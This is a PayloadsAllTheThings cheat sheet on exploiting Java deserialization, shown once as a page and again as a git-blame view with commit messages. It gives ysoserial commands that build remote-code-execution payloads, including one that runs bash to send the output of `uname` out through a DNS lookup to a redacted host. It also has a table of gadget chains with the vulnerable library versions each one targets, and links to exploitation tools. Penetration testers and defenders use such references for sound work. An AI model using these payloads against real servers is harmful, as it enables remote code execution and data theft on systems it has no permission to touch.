PayloadsAllTheThings/Insecure Deserialization/Java.md

# Java Deserialization

## Detection

- "AC ED 00 05" in Hex
- "rO0" in Base64
- Content-type = "application/x-java-serialized-object"
- "H4sIAAAAAAAAAJ" in gzip(base64)

## Exploit

[ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

```java
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
```

payload | author | dependencies | impact (if not RCE)
------|--------|------ |------
BeanShell1          |@pwntester, @cschneider4711 |bsh:2.0b5
C3P0                |@mbechler                   |c3p0:0.9.5.2, mchange-commons-java:0.2.11
Clojure             |@JackOfMostTrades           |clojure:1.8.0
CommonsBeanutils1   |@frohoff                    |commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
CommonsCollections1 |@frohoff                    |commons-collections:3.1
CommonsCollections2 |@frohoff                    |commons-collections4:4.0
CommonsCollections3 |@frohoff                    |commons-collections:3.1
CommonsCollections4 |@frohoff                    |commons-collections4:4.0
CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1
CommonsCollections6 |@matthias_kaiser            |commons-collections:3.1
FileUpload1         |@mbechler                   |commons-fileupload:1.3.1, commons-io:2.4 | file uploading
Groovy1             |@frohoff                    |groovy:2.3.9
Hibernate1          |@mbechler|
Hibernate2          |@mbechler|
JBossInterceptors1  |@matthias_kaiser            |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
JRMPClient          |@mbechler|
JRMPListener        |@mbechler|
JSON1               |@mbechler                   |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
JavassistWeld1      |@matthias_kaiser            |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jdk7u21             |@frohoff|
Jython1             |@pwntester, @cschneider4711 |jython-standalone:2.5.2
MozillaRhino1       |@matthias_kaiser            |js:1.7R2
Myfaces1            |@mbechler|
Myfaces2            |@mbechler|
ROME                |@mbechler                   |rome:1.0
Spring1             |@frohoff                    |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
Spring2             |@mbechler                   |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
URLDNS              |@gebl| | jre only vuln detect
Wicket1             |@jacob-baines               |wicket-util:6.23.0, slf4j-api:1.6.4

Additional tools (integration ysoserial with Burp Suite):

- [JavaSerialKiller](https://github.com/NetSPI/JavaSerialKiller)
- [Java Deserialization Scanner](https://github.com/federicodotta/Java-Deserialization-Scanner)
- [Burp-ysoserial](https://github.com/summitt/burp-ysoserial)
- [SuperSerial](https://github.com/DirectDefense/SuperSerial)
- [SuperSerial-Active](https://github.com/DirectDefense/SuperSerial-Active)

JRE8u20_RCE_Gadget
[https://github.com/pwntester/JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget)

JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss)

## References

- [Github - ysoserial](https://github.com/frohoff/ysoserial)
- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
- [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
- [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
Refactoring XSS 0/? 2018-03-23 12:53:53 +00:00			`# Java Deserialization`

PHP Serialization - phpggc 2018-10-01 10:30:14 +00:00			`## Detection`

			`- "AC ED 00 05" in Hex`
			`- "rO0" in Base64`
			`- Content-type = "application/x-java-serialized-object"`
			`- "H4sIAAAAAAAAAJ" in gzip(base64)`

Refactoring XSS 0/? 2018-03-23 12:53:53 +00:00			`## Exploit`
Markdown formatting update 2018-08-12 21:30:22 +00:00
Refactoring XSS 0/? 2018-03-23 12:53:53 +00:00			`[ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```java
Refactoring XSS 0/? 2018-03-23 12:53:53 +00:00			`java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin`
			`java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin`
			`java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin`
SSRF to XSS + Retail account Windows 2018-06-05 22:05:28 +00:00			java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' \| gzip \| base64
Refactoring XSS 0/? 2018-03-23 12:53:53 +00:00			```

			`payload \| author \| dependencies \| impact (if not RCE)`
			`------\|--------\|------ \|------`
			`BeanShell1 \|@pwntester, @cschneider4711 \|bsh:2.0b5`
			`C3P0 \|@mbechler \|c3p0:0.9.5.2, mchange-commons-java:0.2.11`
			`Clojure \|@JackOfMostTrades \|clojure:1.8.0`
			`CommonsBeanutils1 \|@frohoff \|commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2`
			`CommonsCollections1 \|@frohoff \|commons-collections:3.1`
			`CommonsCollections2 \|@frohoff \|commons-collections4:4.0`
			`CommonsCollections3 \|@frohoff \|commons-collections:3.1`
			`CommonsCollections4 \|@frohoff \|commons-collections4:4.0`
			`CommonsCollections5 \|@matthias_kaiser, @jasinner \|commons-collections:3.1`
			`CommonsCollections6 \|@matthias_kaiser \|commons-collections:3.1`
			`FileUpload1 \|@mbechler \|commons-fileupload:1.3.1, commons-io:2.4 \| file uploading`
			`Groovy1 \|@frohoff \|groovy:2.3.9`
			`Hibernate1 \|@mbechler\|`
			`Hibernate2 \|@mbechler\|`
			`JBossInterceptors1 \|@matthias_kaiser \|javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21`
			`JRMPClient \|@mbechler\|`
			`JRMPListener \|@mbechler\|`
			`JSON1 \|@mbechler \|json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1`
			`JavassistWeld1 \|@matthias_kaiser \|javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21`
			`Jdk7u21 \|@frohoff\|`
			`Jython1 \|@pwntester, @cschneider4711 \|jython-standalone:2.5.2`
			`MozillaRhino1 \|@matthias_kaiser \|js:1.7R2`
			`Myfaces1 \|@mbechler\|`
			`Myfaces2 \|@mbechler\|`
			`ROME \|@mbechler \|rome:1.0`
			`Spring1 \|@frohoff \|spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE`
			`Spring2 \|@mbechler \|spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2`
			`URLDNS \|@gebl\| \| jre only vuln detect`
			`Wicket1 \|@jacob-baines \|wicket-util:6.23.0, slf4j-api:1.6.4`

			`Additional tools (integration ysoserial with Burp Suite):`
Markdown formatting update 2018-08-12 21:30:22 +00:00
Refactoring XSS 0/? 2018-03-23 12:53:53 +00:00			`- [JavaSerialKiller](https://github.com/NetSPI/JavaSerialKiller)`
			`- [Java Deserialization Scanner](https://github.com/federicodotta/Java-Deserialization-Scanner)`
			`- [Burp-ysoserial](https://github.com/summitt/burp-ysoserial)`
			`- [SuperSerial](https://github.com/DirectDefense/SuperSerial)`
			`- [SuperSerial-Active](https://github.com/DirectDefense/SuperSerial-Active)`

			`JRE8u20_RCE_Gadget`
			`[https://github.com/pwntester/JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget)`

PHP Serialization - phpggc 2018-10-01 10:30:14 +00:00			`JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss)`

Adding references sectio 2018-12-24 14:02:50 +00:00			`## References`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			`- [Github - ysoserial](https://github.com/frohoff/ysoserial)`
			`- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)`
			`- [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)`
PHP Serialization - phpggc 2018-10-01 10:30:14 +00:00			`- [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)`
			`- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)`